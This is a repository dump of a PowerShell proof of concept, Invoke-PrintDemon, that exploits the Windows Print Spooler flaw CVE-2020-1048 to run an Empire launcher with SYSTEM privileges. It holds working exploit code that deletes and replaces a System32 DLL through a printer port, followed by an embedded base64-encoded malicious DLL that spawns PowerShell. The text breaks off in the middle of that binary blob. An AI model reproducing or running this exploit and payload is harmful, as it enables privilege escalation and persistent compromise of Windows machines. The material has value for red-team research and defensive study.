Repository: BC-SECURITY/Invoke-PrintDemon
Branch: master
Commit: 4e67182650ff
Files: 4
Total size: 26.0 KB
Directory structure:
gitextract_3zzsupzv/
├── .github/
│ └── FUNDING.yml
├── Invoke-PrintDemon.ps1
├── README.md
└── gitignore
================================================
FILE CONTENTS
================================================
================================================
FILE: .github/FUNDING.yml
================================================
# These are supported funding model platforms
github: [bc-security]
================================================
FILE: Invoke-PrintDemon.ps1
================================================
function Invoke-PrintDemon {
<#
.SYNOPSIS
This is an Empire launcher PoC using PrintDemon, the CVE-2020-1048
is a privilege escalation vulnerability that allows a persistent
threat through Windows Print Spooler. The vulnerability allows an
unprivileged user to gain system-level privileges. Based on
@ionescu007 PoC.
Author: @hubbl3, @Cx01N
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.EXAMPLE
PS> Invoke-PrintDemon 'vAG4AUAB1CsAJABLACkAKQB8AEkARQBYAA=='
.LINK
https://github.com/ionescu007/PrintDemo
https://stackoverflow.com/questions/4442122/send-raw-zpl-to-zebra-printer-via-usb
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1048
#>
param(
[Parameter()]
[string]$LauncherCode
)
$LauncherCode = "kill (Get-Process FXSSVC).Id -force; Remove-Item -path 'C:\Windows\System32\ualapi.dll';" + [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($LauncherCode))
$LauncherCode = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($LauncherCode))
Add-PrinterDriver -Name "Generic / Text Only"
Add-PrinterPort -Name "C:\Windows\system32\ualapi.dll"
Add-Printer -Name "PrintDemon" -DriverName "Generic / Text Only" -PortName "C:\Windows\System32\Ualapi.dll"
$Ref = (
"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
);
$MethodDefinition = @"
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace Printer {
public class RawPrinterHelper
{
// Structure and API declarions:
[StructLayout(LayoutKind.Sequential, CharSet = CharSet.Ansi)]
public class DOCINFOA
{
[MarshalAs(UnmanagedType.LPStr)]
public string pDocName;
[MarshalAs(UnmanagedType.LPStr)]
public string pOutputFile;
[MarshalAs(UnmanagedType.LPStr)]
public string pDataType;
}
[DllImport("winspool.Drv", EntryPoint = "OpenPrinterA", SetLastError = true, CharSet = CharSet.Ansi, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool OpenPrinter([MarshalAs(UnmanagedType.LPStr)] string szPrinter, out IntPtr hPrinter, IntPtr pd);
[DllImport("winspool.Drv", EntryPoint = "ClosePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool ClosePrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "StartDocPrinterA", SetLastError = true, CharSet = CharSet.Ansi, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool StartDocPrinter(IntPtr hPrinter, Int32 level, [In, MarshalAs(UnmanagedType.LPStruct)] DOCINFOA di);
[DllImport("winspool.Drv", EntryPoint = "EndDocPrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool EndDocPrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "StartPagePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool StartPagePrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "EndPagePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool EndPagePrinter(IntPtr hPrinter);
[DllImport("winspool.Drv", EntryPoint = "WritePrinter", SetLastError = true, ExactSpelling = true, CallingConvention = CallingConvention.StdCall)]
public static extern bool WritePrinter(IntPtr hPrinter, IntPtr pBytes, Int32 dwCount, out Int32 dwWritten);
// SendBytesToPrinter()
// When the function is given a printer name and an unmanaged array
// of bytes, the function sends those bytes to the print queue.
// Returns true on success, false on failure.
public static bool SendBytesToPrinter(string szPrinterName, IntPtr pBytes, Int32 dwCount)
{
Int32 dwError = 0, dwWritten = 0;
IntPtr hPrinter = new IntPtr(0);
DOCINFOA di = new DOCINFOA();
bool bSuccess = false; // Assume failure unless you specifically succeed.
di.pDocName = "My C#.NET RAW Document";
di.pDataType = "RAW";
// Open the printer.
if (OpenPrinter(szPrinterName.Normalize(), out hPrinter, IntPtr.Zero))
{
// Start a document.
if (StartDocPrinter(hPrinter, 1, di))
{
// Start a page.
if (StartPagePrinter(hPrinter))
{
// Write your bytes.
bSuccess = WritePrinter(hPrinter, pBytes, dwCount, out dwWritten);
EndPagePrinter(hPrinter);
}
EndDocPrinter(hPrinter);
}
ClosePrinter(hPrinter);
}
// If you did not succeed, GetLastError may give more information
// about why not.
if (bSuccess == false)
{
dwError = Marshal.GetLastWin32Error();
}
return bSuccess;
}
public static bool SendFileToPrinter(string szPrinterName, string szFileName)
{
// Open the file.
FileStream fs = new FileStream(szFileName, FileMode.Open);
// Create a BinaryReader on the file.
BinaryReader br = new BinaryReader(fs);
// Dim an array of bytes big enough to hold the file's contents.
Byte[] bytes = new Byte[fs.Length];
bool bSuccess = false;
// Your unmanaged pointer.
IntPtr pUnmanagedBytes = new IntPtr(0);
int nLength;
nLength = Convert.ToInt32(fs.Length);
// Read the contents of the file into the array.
bytes = br.ReadBytes(nLength);
// Allocate some unmanaged memory for those bytes.
pUnmanagedBytes = Marshal.AllocCoTaskMem(nLength);
// Copy the managed byte array into the unmanaged array.
Marshal.Copy(bytes, 0, pUnmanagedBytes, nLength);
// Send the unmanaged bytes to the printer.
bSuccess = SendBytesToPrinter(szPrinterName, pUnmanagedBytes, nLength);
// Free the unmanaged memory that you allocated earlier.
Marshal.FreeCoTaskMem(pUnmanagedBytes);
return bSuccess;
}
}
}
"@;
Add-Type -ReferencedAssemblies $Ref -TypeDefinition $MethodDefinition -Language CSharp;
$PE = [System.Convert]::FromBase64String('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AAAAAL48AAAAAAAA1DwAAAAAAAACPgAAAAAAAAw9AAAAAAAAHj0AAAAAAAAsPQAAAAAAAEo9AAAAAAAAWj0AAAAAAAB2PQAAAAAAAIo9AAAAAAAAmD0AAAAAAAC4PQAAAAAAAMQ9AAAAAAAA2D0AAAAAAADwPQAAAAAAAPY8AAAAAAAAAAAAAAAAAAACAAAAAAAAgPI6AAAAAAAA5joAAAAAAAACOwAAAAAAAA0AAAAAAACA2DoAAAAAAABzAAAAAAAAgMg6AAAAAAAAAwAAAAAAAIBvAAAAAAAAgAAAAAAAAAAAhjsAAAAAAABsOwAAAAAAAFg7AAAAAAAAUD8AAAAAAAAsOwAAAAAAAB47AAAAAAAASDsAAAAAAAAAAAAAAAAAAAcAR2V0QWRkckluZm9XAABXAFdTQVNvY2tldFcAADoAV1NBSW9jdGwAAAkAR2V0TmFtZUluZm9XAAACAEZyZWVBZGRySW5mb1cAV1MyXzMyLmRsbAAAIwBEYmdQcmludEV4AADWAU50UXVlcnlJbmZvcm1hdGlvblByb2Nlc3MA5AFOdFF1ZXJ5T2JqZWN0AOsCUnRsQ2FwdHVyZUNvbnRleHQA0wRSdGxMb29rdXBGdW5jdGlvbkVudHJ5AAD8BVJ0bFZpcnR1YWxVbndpbmQAAG50ZGxsLmRsbAB4BFJlYWRGaWxlAACUAENsb3NlVGhyZWFkcG9vbFdvcmsAjgBDbG9zZVRocmVhZHBvb2wAkwVTdGFydFRocmVhZHBvb2xJbwD1AENyZWF0ZVRocmVhZHBvb2wAAFQDSGVhcEZyZWUAAB8CR2V0Q3VycmVudFByb2Nlc3MAIwZXcml0ZUZpbGUA9wBDcmVhdGVUaHJlYWRwb29sSW8AAN4AQ3JlYXRlTmFtZWRQaXBlVwAAbQNJbml0aWFsaXplUHJvY1RocmVhZEF0dHJpYnV0ZUxpc3QA6gVXYWl0Rm9yVGhyZWFkcG9vbElvQ2FsbGJhY2tzAADoBVdhaXRGb3JTaW5nbGVPYmplY3QAzQBDcmVhdGVGaWxlVwB2AENhbmNlbFRocmVhZHBvb2xJbwAA7QVXYWl0Rm9yVGhyZWFkcG9vbFdvcmtDYWxsYmFja3MAAHEAQ2FsbGJhY2tNYXlSdW5Mb25nAAAxAUR1cGxpY2F0ZUhhbmRsZQARBE9wZW5Qcm9jZXNzAI8AQ2xvc2VUaHJlYWRwb29sQ2xlYW51cEdyb3VwAGkCR2V0TGFzdEVycm9yAADLBVVwZGF0ZVByb2NUaHJlYWRBdHRyaWJ1dGUAIwJHZXRDdXJyZW50VGhyZWFkAACIAENsb3NlSGFuZGxlAPYAQ3JlYXRlVGhyZWFkcG9vbENsZWFudXBHcm91cAAAUANIZWFwQWxsb2MAkQBDbG9zZVRocmVhZHBvb2xJbwCUBVN1Ym1pdFRocmVhZHBvb2xXb3JrAAC9AkdldFByb2Nlc3NIZWFwAADnAENyZWF0ZVByb2Nlc3NXAAD6AENyZWF0ZVRocmVhZHBvb2xXb3JrAAC+BVVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAfQVTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAnAVUZXJtaW5hdGVQcm9jZXNzAABLRVJORUwzMi5kbGwAAHABR2V0VG9rZW5JbmZvcm1hd